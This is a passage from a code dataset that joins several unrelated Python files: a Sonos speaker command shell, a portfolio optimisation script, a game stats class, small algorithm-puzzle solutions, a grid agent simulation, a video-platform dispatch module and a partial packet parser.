args = _check_args(cmd, args)\n\n try:\n result = _call_func(func, args)\n except TypeError as ex:\n err(ex)\n return\n\n # colorama.init() takes over stdout/stderr to give cross-platform colors\n if colorama:\n colorama.init()\n\n # process output\n if result is None:\n pass\n\n elif hasattr(result, '__iter__'):\n try:\n for line in result:\n print(line)\n except TypeError as ex:\n err(ex)\n return\n\n else:\n print(result)\n\n # Release stdout/stderr from colorama\n if colorama:\n colorama.deinit()\n\n\ndef _call_func(func, args):\n \"\"\" handles str-based functions and calls appropriately \"\"\"\n\n # determine how to call function\n if isinstance(func, str):\n sonos = args.pop(0)\n method = getattr(sonos, func)\n return method(*args) # pylint: disable=star-args\n\n else:\n return func(*args) # pylint: disable=star-args\n\n\ndef _check_args(cmd, args):\n \"\"\" checks if func is called for a speaker and updates 'args' \"\"\"\n\n req_ip, func = COMMANDS[cmd]\n\n if not req_ip:\n return func, args\n\n if not CUR_SPEAKER:\n if not args:\n err('Please specify a speaker IP for \"{cmd}\".'.format(cmd=cmd))\n return None, None\n else:\n speaker_spec = args.pop(0)\n sonos = soco.SoCo(speaker_spec)\n args.insert(0, sonos)\n else:\n args.insert(0, CUR_SPEAKER)\n\n return func, args\n\n\ndef shell():\n \"\"\" Start an interactive shell \"\"\"\n\n if readline is not None:\n readline.parse_and_bind('tab: complete')\n readline.set_completer(complete_command)\n readline.set_completer_delims(' ')\n\n while True:\n try:\n # Not sure why this is necessary, as there is a player_name attr\n # pylint: disable=no-member\n if CUR_SPEAKER:\n line = input('socos({speaker}|{state})> '.format(\n speaker=CUR_SPEAKER.player_name,\n state=state(CUR_SPEAKER).title()).encode('utf-8'))\n else:\n line = input('socos> ')\n except EOFError:\n print('')\n break\n except KeyboardInterrupt:\n print('')\n continue\n\n line = line.strip()\n if not line:\n continue\n\n try:\n args = shlex.split(line)\n except ValueError as value_error:\n err('Syntax error: %(error)s' % {'error': value_error})\n continue\n\n try:\n process_cmd(args)\n except KeyboardInterrupt:\n err('Keyboard interrupt.')\n except EOFError:\n err('EOF.')\n\n\ndef complete_command(text, context):\n \"\"\" auto-complete commands\n\n text is the text to be auto-completed\n context is an index, increased for every call for \"text\" to get next match\n \"\"\"\n matches = [cmd for cmd in COMMANDS.keys() if cmd.startswith(text)]\n return matches[context]\n\n\ndef adjust_volume(sonos, operator):\n \"\"\" Adjust the volume up or down with a factor from 1 to 100 \"\"\"\n factor = get_volume_adjustment_factor(operator)\n if not factor:\n return False\n\n vol = sonos.volume\n\n if operator[0] == '+':\n if (vol + factor) > 100:\n factor = 1\n sonos.volume = (vol + factor)\n return sonos.volume\n elif operator[0] == '-':\n if (vol - factor) < 0:\n factor = 1\n sonos.volume = (vol - factor)\n return sonos.volume\n else:\n err(\"Valid operators for volume are + and -\")\n\n\ndef get_volume_adjustment_factor(operator):\n \"\"\" get the factor to adjust the volume with \"\"\"\n factor = 1\n if len(operator) > 1:\n try:\n factor = int(operator[1:])\n except ValueError:\n err(\"Adjustment factor for volume has to be a int.\")\n return\n return factor\n\n\ndef get_current_track_info(sonos):\n \"\"\" Show the current track \"\"\"\n track = sonos.get_current_track_info()\n return (\n \"Current track: %s - %s. From album %s. This is track number\"\n \" %s in the playlist. It is %s minutes long.\" % (\n track['artist'],\n track['title'],\n track['album'],\n track['playlist_position'],\n track['duration'],\n )\n )\n\n\ndef get_queue(sonos):\n \"\"\" Show the current queue \"\"\"\n queue = sonos.get_queue()\n\n # pylint: disable=invalid-name\n ANSI_BOLD = '\\033[1m'\n ANSI_RESET = '\\033[0m'\n\n current = int(sonos.get_current_track_info()['playlist_position'])\n\n queue_length = len(queue)\n padding = len(str(queue_length))\n\n for idx, track in enumerate(queue, 1):\n if idx == current:\n color = ANSI_BOLD\n else:\n color = ANSI_RESET\n\n idx = str(idx).rjust(padding)\n yield (\n \"%s%s: %s - %s. From album %s.\" % (\n color,\n idx,\n track.creator,\n track.title,\n track.album,\n )\n )\n\n\ndef err(message):\n \"\"\" print an error message \"\"\"\n print(message, file=sys.stderr)\n\n\ndef play_index(sonos, index):\n \"\"\" Play an item from the playlist \"\"\"\n queue_length = len(sonos.get_queue())\n try:\n index = int(index) - 1\n if index >= 0 and index < queue_length:\n position = sonos.get_current_track_info()['playlist_position']\n current = int(position) - 1\n if index != current:\n return sonos.play_from_queue(index)\n else:\n raise ValueError()\n except ValueError():\n return \"Index has to be a integer within \\\n the range 1 - %d\" % queue_length\n\n\ndef list_ips():\n \"\"\" List available devices \"\"\"\n sonos = soco.SonosDiscovery()\n return sonos.get_speaker_ips()\n\n\ndef speaker_info(sonos):\n \"\"\" Information about a speaker \"\"\"\n infos = sonos.get_speaker_info()\n return ('%s: %s' % (i, infos[i]) for i in infos)\n\n\ndef volume(sonos, *args):\n \"\"\" Change or show the volume of a device \"\"\"\n if args:\n operator = args[0].lower()\n adjust_volume(sonos, operator)\n\n return sonos.volume\n\n\ndef exit_shell():\n \"\"\" Exit socos \"\"\"\n sys.exit(0)\n\n\ndef play(sonos, *args):\n \"\"\" Start playing \"\"\"\n if args:\n idx = args[0]\n play_index(sonos, idx)\n else:\n sonos.play()\n return get_current_track_info(sonos)\n\n\ndef play_next(sonos):\n \"\"\" Play the next track \"\"\"\n sonos.next()\n return get_current_track_info(sonos)\n\n\ndef play_previous(sonos):\n \"\"\" Play the previous track \"\"\"\n sonos.previous()\n return get_current_track_info(sonos)\n\n\ndef state(sonos):\n \"\"\" Get the current state of a device / group \"\"\"\n return sonos.get_current_transport_info()['current_transport_state']\n\n\ndef set_speaker(ip_address):\n \"\"\" set the current speaker for the shell session \"\"\"\n # pylint: disable=global-statement,fixme\n # TODO: this should be refactored into a class with instance-wide state\n global CUR_SPEAKER\n CUR_SPEAKER = soco.SoCo(ip_address)\n\n\ndef unset_speaker():\n \"\"\" resets the current speaker for the shell session \"\"\"\n global CUR_SPEAKER # pylint: disable=global-statement\n CUR_SPEAKER = None\n\n\ndef get_help(command=None):\n \"\"\" Prints a list of commands with short description \"\"\"\n\n def _cmd_summary(item):\n \"\"\" Format command name and first line of docstring \"\"\"\n name, func = item[0], item[1][1]\n if isinstance(func, str):\n func = getattr(soco.SoCo, func)\n doc = getattr(func, '__doc__') or ''\n doc = doc.split('\\n')[0].lstrip()\n return ' * {cmd:12s} {doc}'.format(cmd=name, doc=doc)\n\n if command and command in COMMANDS:\n func = COMMANDS[command][1]\n doc = getattr(func, '__doc__') or ''\n doc = [line.lstrip() for line in doc.split('\\n')]\n out = '\\n'.join(doc)\n else:\n texts = ['Available commands:']\n # pylint: disable=bad-builtin\n texts += map(_cmd_summary, COMMANDS.items())\n out = '\\n'.join(texts)\n return out\n\n\n# COMMANDS indexes commands by their name. Each command is a 2-tuple of\n# (requires_ip, function) where function is either a callable, or a\n# method name to be called on a SoCo instance (depending on requires_ip)\n# If requires_ip is False, function must be a callable.\nCOMMANDS = OrderedDict((\n # cmd req IP func\n # pylint: disable=bad-whitespace\n ('list', (False, list_ips)),\n ('partymode', (True, 'partymode')),\n ('info', (True, speaker_info)),\n ('play', (True, play)),\n ('pause', (True, 'pause')),\n ('stop', (True, 'stop')),\n ('next', (True, play_next)),\n ('previous', (True, play_previous)),\n ('current', (True, get_current_track_info)),\n ('queue', (True, get_queue)),\n ('volume', (True, volume)),\n ('state', (True, state)),\n ('ml_index', (True, MUSIC_LIB.index)),\n ('ml_tracks', (True, MUSIC_LIB.tracks)),\n ('ml_albums', (True, MUSIC_LIB.albums)),\n ('ml_artists', (True, MUSIC_LIB.artists)),\n ('ml_playlists', (True, MUSIC_LIB.playlists)),\n ('exit', (False, exit_shell)),\n ('set', (False, set_speaker)),\n ('unset', (False, unset_speaker)),\n ('help', (False, get_help)),\n))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"socos.py","file_name":"socos.py","file_ext":"py","file_size_in_byte":23755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"612342666","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\ncovarMat = pd.read_csv('/home/hassan/Downloads/Book1.csv')\nreturns = pd.read_csv('/home/hassan/Downloads/Book2.csv')\ntBills = pd.read_csv('/home/hassan/Downloads/Book3.csv')\ntBills.drop(0,inplace=True)\n\nsP500 = pd.read_csv('/home/hassan/Downloads/Book4.csv')\nasset_pctChange_daily = pd.read_csv('/home/hassan/Downloads/Book5.csv')\nasset_pctChange_daily.drop('S&P500',axis=1,inplace=True)\nomega = np.array(covarMat)\nreturns = returns[['Stock code' , 'avg_expected_return']]\nexp_returns = np.array(returns['avg_expected_return'])\nassets = 20\nassets_ref = 2\nasset_pctChange = np.array(asset_pctChange_daily)\n\n\n\n\nrisk_free_rate = 0.021\ntBills.drop('Unnamed: 2', axis=1, inplace=True)\n\nfor i in range(len(tBills)):\n\ttBills.loc[i+1,'Tbills'] = tBills.loc[i+1,'Tbills']/100\n\n\n\ntBills_sP500 = tBills.merge(sP500, on='Time Period')\npctCh_sP500 = tBills_sP500['S&P 500'].pct_change()\ndf_pctCh_sP500 = pd.DataFrame({'pctCh_sP500': pctCh_sP500})\n\n\npctCh_sP500_tBills = df_pctCh_sP500.join(tBills_sP500['Tbills'])\n\nch1 = pctCh_sP500_tBills.describe()\nch2 = pctCh_sP500_tBills.corr()\ncorr_ref = ch2.loc['Tbills','pctCh_sP500']\n\n\nmeans_ref = np.array(ch1.loc['mean',ch1.columns])\nstd_ref = np.array(ch1.loc['std',ch1.columns])\nlabels_ref = np.array(ch1.columns)\nref_cov = corr_ref*std_ref[0]*std_ref[1]\n\n\nprint(' ' , labels_ref)\nprint('mean : ' , means_ref)\nprint('std : ' , std_ref)\ntbill_ret = means_ref[1]\nsP500_ret = means_ref[0]\ntbill_risk = std_ref[1]\nsP500_risk = std_ref[0]\n\nprint('reference portfolio covariance : ', ref_cov)\n'''________________Monte Carlo Simulation_________________'''\nnumOfPortfolios = 75000\nreturns_risks = np.array([[0,0]])\nweights_hist = np.array([[0 for i in range(assets)]])\nsharpeRatios = np.array([0])\n\n\n\nreturns_risks_ref = np.array([[0,0]])\nweights_hist_ref = np.array([[0 for i in range(assets_ref)]])\nsharpeRatios_ref = np.array([0])\ncovarMat_ref = np.array(pctCh_sP500_tBills.cov())\n\n\n'''___ Monte Carlo Simulation for Optimal Portfolio calculation___'''\nfor i in range(numOfPortfolios):\n\tw = np.random.random(size=assets)\n\tw = np.absolute(w)\n\tw /= sum(w)\n\tfirst = omega.dot(w)\n\tvariance = np.dot(w, first)\n\tvolatility = np.sqrt(variance)\n\treturn_portfolio = np.dot(w,exp_returns)\n\tdiff = return_portfolio - risk_free_rate\n\tsharpeRatios = np.append(sharpeRatios, diff/volatility)\n\treturns_risks = np.append(returns_risks,\n\t\t [[return_portfolio,volatility]],\n\t\t axis=0)\n\tweights_hist = np.append(weights_hist,\n\t\t\t\t\t\t [[i for i in w]],\n\t\t\t\t\t\t axis=0)\nelse : \n\treturns_risks = np.delete(returns_risks,(0),axis=0)\n\tweights_hist = np.delete(weights_hist,(0),axis=0)\n\tsharpeRatios = np.delete(sharpeRatios,(0),axis=0)\n\tmax_sharpe = max(sharpeRatios)\n\tmax_sharpe_index = np.argmax(sharpeRatios)\n\tweights_optimal = weights_hist[max_sharpe_index]\n\n\nexp_returns_ref = np.array([sP500_ret , tbill_ret])\n\nfor i in range(numOfPortfolios):\n\tw_ref = np.random.random(size=assets_ref)\n\tw_ref = np.absolute(w_ref)\n\tw_ref /= sum(w_ref)\n\tfirst_ref = np.dot(covarMat_ref,w_ref)\n\tvariance_ref = np.dot(w_ref, first_ref)\n\tvolatility_ref = np.sqrt(variance_ref)\n\treturn_portfolio_ref = np.dot(w_ref,exp_returns_ref)\n\tdiff_ref = return_portfolio_ref - risk_free_rate\n\tsharpeRatios_ref = np.append(sharpeRatios_ref, diff_ref/volatility_ref)\n\treturns_risks_ref = np.append(returns_risks_ref,\n\t\t [[return_portfolio_ref, volatility_ref]],\n\t\t axis=0)\n\tweights_hist_ref = np.append(weights_hist_ref,\n\t\t\t\t\t\t [[i for i in w_ref]],\n\t\t\t\t\t\t axis=0)\nelse : \n\treturns_risks_ref = np.delete(returns_risks_ref,(0),axis=0)\n\tweights_hist_ref = np.delete(weights_hist_ref,(0),axis=0)\n\tsharpeRatios_ref = np.delete(sharpeRatios_ref,(0),axis=0)\n\tmax_sharpe_ref = max(sharpeRatios_ref)\n\tmax_sharpe_index_ref = np.argmax(sharpeRatios_ref)\n\tweights_optimal_ref = weights_hist_ref[max_sharpe_index_ref]\n\n\n\t\nprint('\\n \\n')\n\nprint('the maximum sharpe ratio is : ', max_sharpe)\nprint('optimal returns & risk : ' , returns_risks[max_sharpe_index])\nreturn_risk_opt = returns_risks[max_sharpe_index]\nreturn_risk_refOpt = returns_risks_ref[max_sharpe_index_ref]\n\nprint('\\n')\nw1_ref_port = returns_risks[max_sharpe_index,0]/tbill_ret\nprint(str(returns_risks[max_sharpe_index,0])+'/'+str(tbill_ret))\nprint('\\n')\nprint('The reference portfolio needs a '+str(w1_ref_port)+' times greater investment to match our portfolio\\'s return')\nprint('\\n')\nrisk_ref = w1_ref_port*tbill_risk\nriskComparison_port2ref = returns_risks[max_sharpe_index,1]/risk_ref\nprint('Our portfolio is '+str(riskComparison_port2ref)+' times risker than the reference portfolio')\nprint(str(returns_risks[max_sharpe_index,1])+'/'+str(risk_ref))\n\nprint('\\n \\n')\nprint('the maximum sharpe ratio for ref portfolio is : ', max_sharpe_ref)\nprint('optimal returns & risk for ref portfolio is : ' , returns_risks_ref[max_sharpe_index_ref])\nprint('weights for optimal ref portfolio are : ' , weights_optimal_ref)\nprint('\\n \\n ')\nprint('comparing sharpe ratios : ' , max_sharpe , max_sharpe_ref )\n\n\n\nportfolio_pctChange = asset_pctChange.dot(weights_optimal)\nportfolio_pctChange_ref = np.array(pctCh_sP500_tBills['Tbills']*w1_ref_port)\n\ndf_pctCh_Optport_ref = pd.DataFrame({'Opt Pf Pct Change' : portfolio_pctChange ,\n\t 'Ref Pf Pct Change' : portfolio_pctChange_ref})\n\n\nsharpe_ratio_ref_m = (return_risk_opt[0]-risk_free_rate)/risk_ref\n\n\ndf_corr_portRef = df_pctCh_Optport_ref.corr()\ndf_covMat_portRef = df_pctCh_Optport_ref.cov()\ncorrelation_OptPort_ref = df_corr_portRef.loc['Opt Pf Pct Change' , 'Ref Pf Pct Change']\n\n\ndf_weights_optimal = pd.DataFrame({'optimal port weights' : weights_optimal})\ndf_weights_optimal_ref = pd.DataFrame({'optimal ref_port weights' : weights_optimal_ref})\n\ndf_return_risk_opt = pd.DataFrame({'optimal portfolio' : np.append(return_risk_opt,max_sharpe),\n\t 'ref optimal portfolio' : np.append(return_risk_refOpt,max_sharpe_ref),\n\t 'ref retMatch portfolio' : [return_risk_opt[0], risk_ref, sharpe_ratio_ref_m ]},\n\t index = ['return','risk','sharpe ratio'] )\n\ndf_misc = pd.DataFrame({ 'Others' : [correlation_OptPort_ref , w1_ref_port , riskComparison_port2ref] },\n\t index = ['corr OptPort & Ref_m' , 'return scale OptPort/refPort', 'risk scale OptPort/refPort'])\n\ndf_corr_portRef.to_csv('corr_matrix_optPort_ref_m.csv')\ndf_covMat_portRef.to_csv('VaCov_mat_optPort_ref_m.csv')\ndf_weights_optimal.to_csv('optPort_weights.csv')\ndf_weights_optimal_ref.to_csv('optRef_weights.csv')\ndf_misc.to_csv('misc.csv')\ndf_return_risk_opt.to_csv('ret_risk_sharpe_optPort_optref_mref.csv')\n\n\nprint(df_return_risk_opt)\n\nx = np.linspace(0, 0.4, numOfPortfolios)\nx2 = np.linspace(0, 0.05, numOfPortfolios)\n\nplt.plot(x, max_sharpe*x + risk_free_rate,label='Our Capital Market Line' ,color='black')\nplt.plot(x2, max_sharpe_ref*x2 + risk_free_rate,label='ref Capital Market Line' ,color='green')\n\n\n\nplt.scatter(return_risk_opt[1],\n\t\t\treturn_risk_opt[0],\n\t\t\tlabel='Optimal Portfolio',\n\t\t\tc='c',\n\t\t\tmarker='x',\n\t\t\ts=200)\nplt.scatter(returns_risks[:,1],\n\t returns_risks[:,0],\n\t label='BitCoin Portfolio Frontier',\n\t c='r',\n\t marker='o')\nplt.scatter(returns_risks_ref[:,1],\n\t returns_risks_ref[:,0],\n\t label='Reference Portfolio Frontier',\n\t c='b',\n\t marker='o')\n\n\nplt.xlabel('Risk')\nplt.ylabel('Expected Return')\nplt.legend(loc=4, prop={'size': 12})\nplt.title('Efficient Frontiers')\nprint(return_risk_opt)\nplt.show()\n\n\n\n","sub_path":"Optimal_port.py","file_name":"Optimal_port.py","file_ext":"py","file_size_in_byte":7633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"165899846","text":"#!/usr/bin/env python3\nfrom chiller_essential import *\nimport datetime\n\naPlayers=[]\n\ndef CalcKD(k, d):\n if k == 0:\n return str(0)\n if d == 0:\n return str(k)\n return str(\"%.2f\" % (k / d))\n\ndef BestTime(t1, t2):\n t = min(t1,t2)\n if t == 0:\n return max(t1, t2) #if no time yet --> set the highest\n return t #if captured already use lowest time\n\ndef A_Best(a1, a2):\n if a1 == \"\":\n return a2\n elif a2 == \"\":\n return a1\n if a1 < a2:\n return a1 # use oldest time\n return a2\n\nclass Player:\n #def __init__(self, name, time=0.0, spree=0, team=\"\", a_haxx0r = \"\", a_blazeit = \"\", a_satan = \"\", a_virgin = \"\"):\n def __init__(self, name, time=0.0, spree=0, team=\"\"):\n self.name = name\n self.kills = 0\n self.deaths = 0\n self.flag_grabs = 0\n self.flag_caps_red = 0\n self.flag_caps_blue = 0\n self.flag_time = time\n self.flagger_kills = 0\n self.best_spree = spree\n self.wins = 0\n self.looses = 0\n self.a_haxx0r = \"\"\n self.a_blazeit = \"\"\n self.a_satan = \"\"\n self.a_virgin = \"\"\n '''\n self.a_haxx0r = a_haxx0r\n self.a_blazeit = a_blazeit\n self.a_satan = a_satan\n self.a_virgin = a_virgin\n '''\n #round variables (not saved)\n self.killingspree = 0\n self.IsFlagger = False\n self.team = team\n self.LastChat = datetime.datetime.now()\n self.MuteScore = 0\n self.IsMuted = False\n def __add__(self, other):\n tmp_player = Player(self.name)\n tmp_player.kills = self.kills + other.kills\n tmp_player.deaths = self.deaths + other.deaths\n tmp_player.flag_grabs = self.flag_grabs + other.flag_grabs\n tmp_player.flag_caps_red = self.flag_caps_red + other.flag_caps_red\n tmp_player.flag_caps_blue = self.flag_caps_blue + other.flag_caps_blue\n tmp_player.flag_time = BestTime(self.flag_time, other.flag_time)\n tmp_player.flagger_kills = self.flagger_kills + other.flagger_kills\n tmp_player.best_spree = max(self.best_spree, other.best_spree)\n tmp_player.wins = self.wins + other.wins\n tmp_player.looses = self.looses + other.looses\n tmp_player.a_haxx0r = A_Best(self.a_haxx0r, other.a_haxx0r)\n tmp_player.a_blazeit = A_Best(self.a_blazeit, other.a_blazeit)\n tmp_player.a_satan = A_Best(self.a_satan, other.a_satan)\n tmp_player.a_virgin = A_Best(self.a_virgin, other.a_virgin)\n \"\"\"\n say(\"== merging '\" + other.name + \"' -> into -> '\" + self.name + \"' ===\")\n say(\"src: \")\n say(\"k/d: \" + str(other.kills) + \" g/r/b/t: \" + str(other.flag_grabs) + \"/\" + str(other.flag_caps_red) + \"/\" + str(other.flag_caps_blue) + \"/\" + str(other.flag_time))\n say(\"dst: \")\n say(\"k/d: \" + str(self.kills) + \" g/r/b/t: \" + str(self.flag_grabs) + \"/\" + str(self.flag_caps_red) + \"/\" + str(self.flag_caps_blue) + \"/\" + str(self.flag_time))\n say(\"merge: \")\n say(\"k/d: \" + str(tmp_player.kills) + \" g/r/b/t: \" + str(tmp_player.flag_grabs) + \"/\" + str(tmp_player.flag_caps_red) + \"/\" + str(tmp_player.flag_caps_blue) + \"/\" + str(tmp_player.flag_time))\n \"\"\"\n return tmp_player\n def ShowStats(self):\n say(\"[stats] '\" + str(self.name) + \"' kills: \" + str(self.kills) + \" deaths: \" + str(self.deaths) + \" killingspree: \" + str(self.best_spree))\n #say(\"[stats] '\" + self.name + \"' flagtime: \" + str(self.flag_time))\n def ShowStatsRound(self):\n say(\"[round-stats] '\" + str(self.name) + \"' kd: \" + CalcKD(self.kills,self.deaths) + \" (\" + str(self.kills) + \"/\" + str(self.deaths) + \")\")\n\n","sub_path":"src/base_player.py","file_name":"base_player.py","file_ext":"py","file_size_in_byte":3691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"499461046","text":"# -*- coding:utf-8 -*-\nclass Solution1:\n def cutRope(self, number):\n # write code here\n if number<=1:\n return 0\n elif number ==2:\n return 1\n elif number == 3:\n return 2\n\n products = [0,1,2,3]\n for i in range(4,number+1):\n max= 0\n for j in range(1,int(i/2)+1):\n product = products[j]*products[i-j]\n if product > max:\n max= product\n\n products.append(max)\n\n return max\n\n\nclass Solution2:\n def cutRope(self, number):\n # write code here\n if number<=1:\n return 0\n elif number ==2:\n return 1\n elif number == 3:\n return 2\n\n threetimes = int(number/3)\n if(number%3==1):\n threetimes -=1\n\n twotimes = int((number - threetimes*3)/2)\n\n max = pow(3,threetimes)*pow(2,twotimes)\n return max\n\nif __name__ == \"__main__\":\n solution1 = Solution2()\n a = solution1.cutRope(8)\n print(a)\n","sub_path":"py-project/Solution14 2.py","file_name":"Solution14 2.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"131142097","text":"# 282. Expression Add Operators\n# https://leetcode.com/problems/expression-add-operators/description/\n\n# Solution: DFS\n# 1)For every position between 2 digits, there are 4 possibilities:\n# no operator; operator +, operator -, operator *\n# Try all of them \n# 2) if using python: eval result string directly to get value,\n# if not using python, eval on the go, special care to operator *.\n# 3) special care to digit 0, since 0 can't be starting digit for num except for 0\n\nOPS = ['+', '-', '*']\n\ndef constructExpression(num, ops):\n ans = []\n for i in xrange(len(num)):\n ans.append(ops[i])\n ans.append(num[i])\n\n return ''.join(ans)\n\ndef generateOperators(num, target, ops, pos, zero_start, ans):\n if pos == len(num):\n expression = constructExpression(num, ops)\n res = eval(expression)\n if res == target:\n ans.append(expression)\n return\n\n # don't insert op\n if not zero_start:\n ops[pos] = ''\n generateOperators(num, target, ops, pos+1, False, ans)\n\n # insert op\n zero_start = num[pos] == '0'\n for op in OPS:\n ops[pos] = op\n generateOperators(num, target, ops, pos+1, zero_start, ans)\n\n return\n\nclass Solution(object):\n def addOperators(self, num, target):\n \"\"\"\n :type num: str\n :type target: int\n :rtype: List[str]\n \"\"\"\n if len(num) == 0:\n return []\n\n ops = [''] * len(num)\n ans = []\n\n zero_start = num[0] == '0'\n generateOperators(num, target, ops, 1, zero_start, ans)\n\n return ans\n\ns = Solution()\nans = s.addOperators(\"123456789\", 45)\nprint(ans)\n ","sub_path":"282.py","file_name":"282.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"46197257","text":"import constants\nfrom random import randint, shuffle\nfrom agent import Agent\n\n\nclass GridModel(object):\n\n def __init__(self):\n self.agents = []\n\n def update(self):\n indices = list(range(len(self.agents)))\n shuffle(indices)\n for index in indices: # update agents in random order\n agent = self.agents[index]\n agent.set_neighbors(self.check_neighbors(agent.x, agent.y))\n if agent.current_activity == constants.SEARCH_AGENT:\n agent.set_dir(self.find_path(agent))\n agent.update(self.get_random_target(index))\n\n def get_random_target(self, agent_idx):\n target_idx = randint(0, (len(self.agents) - 1))\n while target_idx == agent_idx:\n target_idx = randint(0, (len(self.agents) - 1))\n return self.agents[target_idx]\n\n def check_neighbors(self, x, y):\n dirs = [None, None, None, None]\n dirs[constants.NORTH] = self.agent_at(x, y - 1)\n dirs[constants.EAST] = self.agent_at(x + 1, y)\n dirs[constants.SOUTH] = self.agent_at(x, y + 1)\n dirs[constants.WEST] = self.agent_at(x - 1, y)\n return dirs\n\n def agent_at(self, x, y):\n for agent in self.agents:\n if agent.x == x and agent.y == y:\n return agent\n return None\n\n def get_number_of_agents(self):\n return len(self.agents)\n\n def add_agent(self, id, no_agents):\n x = randint(0, constants.TILES_X - 1)\n y = randint(0, constants.TILES_Y - 1)\n self.agents.append(Agent(x, y, id, no_agents))\n\n def find_path(self, agent):\n start = (agent.x, agent.y)\n end = (agent.target_agent.x, agent.target_agent.y)\n\n explored = []\n queue = [start]\n levels = {}\n levels[start] = 0\n visited = [start]\n\n while queue:\n pos = queue.pop(0)\n x = pos[0]\n y = pos[1]\n explored.append(pos)\n neighbours = [(x, y-1), (x+1, y), (x, y+1), (x-1, y)]\n for neighbour in neighbours:\n if neighbour[0] < 0 or neighbour[0] >= constants.TILES_X or neighbour[1] < 0 or neighbour[1] \\\n >= constants.TILES_Y:\n continue\n if self.agent_at(neighbour[0], neighbour[1]) and not neighbour == end:\n continue\n if neighbour not in visited:\n queue.append(neighbour)\n visited.append(neighbour)\n\n levels[neighbour] = levels[pos] + 1\n\n print(levels[start])\n print(levels[end])\n\n\n\n","sub_path":"gridmodel.py","file_name":"gridmodel.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"510770218","text":"from functools import partial\n\nfrom commonspy.logging import log_info\n\nfrom connector import config\nfrom connector.facebook import upload_video_to_facebook, update_video_on_facebook, unpublish_video_on_facebook, \\\n delete_video_on_facebook\nfrom connector.youtube_mcn import upload_video_to_youtube_mcn, delete_video_on_youtube_mcn, unpublish_video_on_youtube_mcn, \\\n update_video_on_youtube_mcn\nfrom connector.youtube_direct import upload_video_to_youtube_direct, delete_video_on_youtube_direct, \\\n unpublish_video_on_youtube_direct, update_video_on_youtube_direct\n\n\ndef test_mode_action(action, video, registry):\n log_info(\"DRY MODE action: '%s' | video: %s | registry: %s\" % (action, video.__dict__, registry.__dict__))\n\nregistered_platforms = {\n 'facebook': {\n 'upload': upload_video_to_facebook,\n 'update': update_video_on_facebook,\n 'unpublish': unpublish_video_on_facebook,\n 'delete': delete_video_on_facebook\n },\n 'youtube': {\n 'upload': upload_video_to_youtube_mcn,\n 'update': update_video_on_youtube_mcn,\n 'unpublish': unpublish_video_on_youtube_mcn,\n 'delete': delete_video_on_youtube_mcn\n },\n 'youtube_direct': {\n 'upload': upload_video_to_youtube_direct,\n 'update': update_video_on_youtube_direct,\n 'unpublish': unpublish_video_on_youtube_direct,\n 'delete': delete_video_on_youtube_direct\n }\n }\n\ntest_mode_platforms = {\n 'facebook': {\n 'upload': partial(test_mode_action, 'facebook upload'),\n 'update': partial(test_mode_action, 'facebook update'),\n 'unpublish': partial(test_mode_action, 'facebook unpublish'),\n 'delete': partial(test_mode_action, 'facebook delete')\n },\n 'youtube': {\n 'upload': partial(test_mode_action, 'youtube upload'),\n 'update': partial(test_mode_action, 'youtube update'),\n 'unpublish': partial(test_mode_action, 'youtube unpublish'),\n 'delete': partial(test_mode_action, 'youtube delete')\n },\n 'youtube_direct': {\n 'upload': partial(test_mode_action, 'youtube_direct upload'),\n 'update': partial(test_mode_action, 'youtube_direct update'),\n 'unpublish': partial(test_mode_action, 'youtube_direct unpublish'),\n 'delete': partial(test_mode_action, 'youtube_direct delete')\n }\n}\n\nclass PlatformInteraction(object):\n def __init__(self):\n if config.property('test_mode'):\n self.registered_platforms = test_mode_platforms\n else:\n self.registered_platforms = registered_platforms\n\n def execute_platform_interaction(self, platform, interaction, video, registry_model):\n if platform in self.registered_platforms and interaction in self.registered_platforms[platform]:\n self.registered_platforms[platform][interaction](video, registry_model)\n else:\n raise Exception('Target platform %s with interaction %s does not exist!')\n","sub_path":"connector/platforms.py","file_name":"platforms.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"496074619","text":"\nimport datetime\nimport time\nimport os\n\nfrom CCITT_CRC16 import CRCfromString\n\n\nclass BIRDpacket(object):\n def __init__(self, strin, filename):\n \"\"\"\n given a line in a string input it as a packet\n \"\"\"\n dt = datetime.datetime.strptime(os.path.basename(filename)[0:10], '%Y-%m-%d')\n hour, minute, second, millisecond = strin.split(' - ')[0].split(':')\n self.grt = datetime.datetime(dt.year, dt.month, dt.day, int(hour),\n int(minute), int(second), int(millisecond)*100)\n self.raw = strin.split(' - ')[1]\n self.srcid = self.raw.split()[1:3]\n self.destid = self.raw.split()[3:5]\n self.cmd_tlm = self.raw.split()[5]\n self.funid = self.raw.split()[6]\n self.seqnum = self.raw.split()[7] # number of pages in request\n self.seqidx = self.raw.split()[8] # counts up to self.seqnum \n self.pktnum = self.raw.split()[9] # packet within page, goes up to 0x13 for each page (last could end early)\n self.datalen = self.raw.split()[10] # can be sorted for the last packet in a page\n self.data = self.raw.split()[11:11+int(self.datalen,16)]\n self.crc = self.raw.split()[11+int(self.datalen, 16):11+int(self.datalen, 16)+2]\n self.valid_crc = self._crc_valid()\n\n def __eq__(self, other):\n attrs = ['data', 'srcid', 'destid']\n for a in attrs:\n if getattr(self, a) != getattr(other, a):\n return False\n return True\n \n def _crc_valid(self):\n \"\"\"\n if the calcuated CRC matches what is in the packet True, False otherwise\n \"\"\"\n calc_crc = CRCfromString(' '.join(self.raw.split(' ')[1:-3])).upper()\n if calc_crc[2:4].upper() == self.crc[0].upper() and \\\n calc_crc[4:6].upper() == self.crc[1].upper():\n return True\n else:\n return False\n\n def __str__(self):\n return('BIRDpacket: GRT: {0} Len:{1}'.format(self.grt.isoformat(), int(self.datalen, 16)))\n\n __repr__ = __str__\n\n\nclass BIRDpackets(list):\n \"\"\"\n make a list of all the BIRDpacket instances in a file\n 